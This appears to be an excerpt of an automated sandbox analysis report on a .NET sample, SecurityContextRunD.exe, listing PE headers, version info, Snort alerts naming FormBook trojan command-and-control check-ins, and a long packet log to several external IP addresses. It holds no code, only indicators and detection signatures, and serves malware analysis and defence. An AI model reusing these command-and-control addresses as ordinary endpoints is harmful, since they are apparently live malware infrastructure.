IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb1f10	0xb2000	False	0.804240366046	data	7.63421102824	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xb4000	0x5c4	0x600	False	0.426432291667	data	4.12651677638	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb6000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xb4090	0x334	data
RT_MANIFEST	0xb43d4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2016
Assembly Version	1.0.0.0
InternalName	SecurityContextRunD.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	View
ProductVersion	1.0.0.0
FileDescription	View
OriginalFilename	SecurityContextRunD.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.435.209.127.15549776802031449 05/14/22-15:30:16.775228	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49776	80	192.168.2.4	35.209.127.155
192.168.2.435.209.127.15549776802031453 05/14/22-15:30:16.775228	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49776	80	192.168.2.4	35.209.127.155
192.168.2.435.209.127.15549776802031412 05/14/22-15:30:16.775228	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49776	80	192.168.2.4	35.209.127.155

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 15:30:03.781282902 CEST	49768	80	192.168.2.4	5.183.8.183
May 14, 2022 15:30:03.920614958 CEST	80	49768	5.183.8.183	192.168.2.4
May 14, 2022 15:30:03.920727968 CEST	49768	80	192.168.2.4	5.183.8.183
May 14, 2022 15:30:03.920893908 CEST	49768	80	192.168.2.4	5.183.8.183
May 14, 2022 15:30:04.060039997 CEST	80	49768	5.183.8.183	192.168.2.4
May 14, 2022 15:30:04.548072100 CEST	80	49768	5.183.8.183	192.168.2.4
May 14, 2022 15:30:04.548129082 CEST	80	49768	5.183.8.183	192.168.2.4
May 14, 2022 15:30:04.548218966 CEST	49768	80	192.168.2.4	5.183.8.183
May 14, 2022 15:30:06.312325001 CEST	49768	80	192.168.2.4	5.183.8.183
May 14, 2022 15:30:06.451627970 CEST	80	49768	5.183.8.183	192.168.2.4
May 14, 2022 15:30:16.363326073 CEST	49774	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.494345903 CEST	80	49774	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.494873047 CEST	49774	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.495182991 CEST	49774	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.495271921 CEST	49774	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.504599094 CEST	49775	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.626019955 CEST	80	49774	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.634051085 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.636746883 CEST	80	49774	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.636895895 CEST	49774	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.637161970 CEST	49775	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.643537998 CEST	49775	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.643937111 CEST	49776	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.773243904 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.773293018 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.773320913 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.773431063 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.773549080 CEST	49775	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.773643017 CEST	49775	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.774919033 CEST	80	49776	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.775083065 CEST	49776	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.775228024 CEST	49776	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:16.903151035 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.903198957 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.903225899 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.903496981 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.903522968 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.903654099 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.905946970 CEST	80	49776	35.209.127.155	192.168.2.4
May 14, 2022 15:30:16.913714886 CEST	80	49775	35.209.127.155	192.168.2.4
May 14, 2022 15:30:17.289189100 CEST	49776	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:17.460618973 CEST	80	49776	35.209.127.155	192.168.2.4
May 14, 2022 15:30:18.098143101 CEST	80	49776	35.209.127.155	192.168.2.4
May 14, 2022 15:30:18.098318100 CEST	49776	80	192.168.2.4	35.209.127.155
May 14, 2022 15:30:22.373779058 CEST	49778	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.546669006 CEST	80	49778	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.546772957 CEST	49778	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.546966076 CEST	49778	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.547004938 CEST	49778	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.547489882 CEST	49779	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.719687939 CEST	80	49778	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.719718933 CEST	80	49778	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.719736099 CEST	80	49778	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.719750881 CEST	80	49778	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.719788074 CEST	49778	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.719824076 CEST	49778	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.719893932 CEST	80	49779	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.719924927 CEST	49778	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.719986916 CEST	49779	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.721510887 CEST	49779	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.721914053 CEST	49780	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.894175053 CEST	80	49779	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.894232035 CEST	80	49779	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.894263029 CEST	80	49779	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.894292116 CEST	80	49779	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.894321918 CEST	49779	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.894367933 CEST	49779	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.894377947 CEST	49779	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.894489050 CEST	80	49780	198.54.117.216	192.168.2.4
May 14, 2022 15:30:22.894987106 CEST	49780	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:22.895159960 CEST	49780	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:23.067143917 CEST	80	49779	198.54.117.216	192.168.2.4
May 14, 2022 15:30:23.067190886 CEST	80	49779	198.54.117.216	192.168.2.4
May 14, 2022 15:30:23.067257881 CEST	49779	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:23.067307949 CEST	49779	80	192.168.2.4	198.54.117.216
May 14, 2022 15:30:23.067642927 CEST	80	49780	198.54.117.216	192.168.2.4
May 14, 2022 15:30:23.067675114 CEST	80	49780	198.54.117.216	192.168.2.4
May 14, 2022 15:30:28.467868090 CEST	49781	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.483691931 CEST	80	49781	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.483841896 CEST	49781	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.487941027 CEST	49781	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.488051891 CEST	49781	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.488487959 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.504026890 CEST	80	49781	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.504388094 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.504643917 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.506386995 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.508757114 CEST	80	49781	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.514334917 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522336006 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522372961 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522399902 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522424936 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522442102 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522453070 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522481918 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522483110 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522496939 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522506952 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522509098 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522521019 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522533894 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522550106 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522561073 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522566080 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522577047 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.522586107 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.522608995 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.531995058 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.532104969 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.532234907 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.538280010 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538311958 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538338900 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538366079 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538392067 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538419008 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538544893 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538572073 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538598061 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538625002 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538650036 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538676977 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538779974 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538809061 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538834095 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538861036 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.538887024 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.544431925 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.549891949 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.782715082 CEST	80	49781	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.782747030 CEST	80	49781	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.782799959 CEST	49781	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.782977104 CEST	49781	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.803536892 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.803555012 CEST	80	49782	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.803613901 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.803654909 CEST	49782	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.838778973 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.838810921 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.838836908 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.838855982 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.838933945 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.838974953 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.839040041 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.852871895 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.852890015 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.852909088 CEST	80	49783	35.241.47.216	192.168.2.4
May 14, 2022 15:30:28.852935076 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.852971077 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:28.852976084 CEST	49783	80	192.168.2.4	35.241.47.216
May 14, 2022 15:30:33.886202097 CEST	49785	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.059770107 CEST	80	49785	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.059911966 CEST	49785	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.060062885 CEST	49785	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.060106993 CEST	49785	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.060677052 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.233109951 CEST	80	49785	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.233189106 CEST	80	49785	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.233275890 CEST	49785	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.233443975 CEST	80	49785	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.233504057 CEST	49785	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.233508110 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.233608007 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.235141993 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.235601902 CEST	49787	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.409087896 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.409153938 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.409213066 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.409284115 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.409404993 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.409495115 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.409496069 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.409564972 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.409691095 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.409763098 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.411199093 CEST	80	49787	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.411294937 CEST	49787	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.411441088 CEST	49787	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.582830906 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.583543062 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.583632946 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.583677053 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.583833933 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.583873987 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.584261894 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.584408998 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.584510088 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.585072041 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.585139036 CEST	80	49786	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.585154057 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.585202932 CEST	49786	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.596900940 CEST	80	49787	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.596960068 CEST	80	49787	198.54.116.236	192.168.2.4
May 14, 2022 15:30:34.597081900 CEST	49787	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.597138882 CEST	49787	80	192.168.2.4	198.54.116.236
May 14, 2022 15:30:34.772506952 CEST	80	49787	198.54.116.236	192.168.2.4
May 14, 2022 15:30:39.961724997 CEST	49796	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.130439043 CEST	80	49796	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.130584955 CEST	49796	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.130705118 CEST	49796	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.130737066 CEST	49796	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.131161928 CEST	49798	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.298274040 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.298456907 CEST	49798	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.299143076 CEST	80	49796	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.299346924 CEST	80	49796	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.299448967 CEST	49796	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.300168991 CEST	49798	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.300617933 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.467217922 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.467242002 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.467257023 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.467276096 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.467349052 CEST	49798	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.467437029 CEST	49798	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.467453957 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.467520952 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.467586994 CEST	49798	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.467601061 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.467608929 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.467706919 CEST	49798	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.467758894 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.634310961 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.634428978 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.634443045 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.634455919 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.634500027 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.634555101 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.634568930 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.634736061 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.634903908 CEST	80	49798	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679183006 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679224968 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679250002 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679270983 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679291964 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679315090 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679328918 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.679337025 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679361105 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679367065 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.679384947 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679406881 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.679419994 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.679459095 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846191883 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846254110 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846296072 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846322060 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846334934 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846376896 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846389055 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846417904 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846456051 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846476078 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846502066 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846544027 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846580029 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846582890 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846622944 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846642971 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846662045 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846702099 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846716881 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846743107 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846784115 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846807957 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846822977 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846864939 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846885920 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846905947 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846946955 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.846967936 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.846987009 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:40.847040892 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:40.978686094 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.013936043 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.013993025 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014034986 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014074087 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014071941 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014111996 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014115095 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014118910 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014156103 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014167070 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014198065 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014241934 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014261007 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014282942 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014324903 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014336109 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014364958 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014404058 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014421940 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014446020 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014486074 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014494896 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014527082 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014566898 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014597893 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014605999 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014611959 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014646053 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014667034 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014687061 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014704943 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014728069 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014767885 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014781952 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014808893 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014848948 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014858961 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014890909 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014929056 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.014947891 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.014970064 CEST	80	49799	38.34.163.59	192.168.2.4
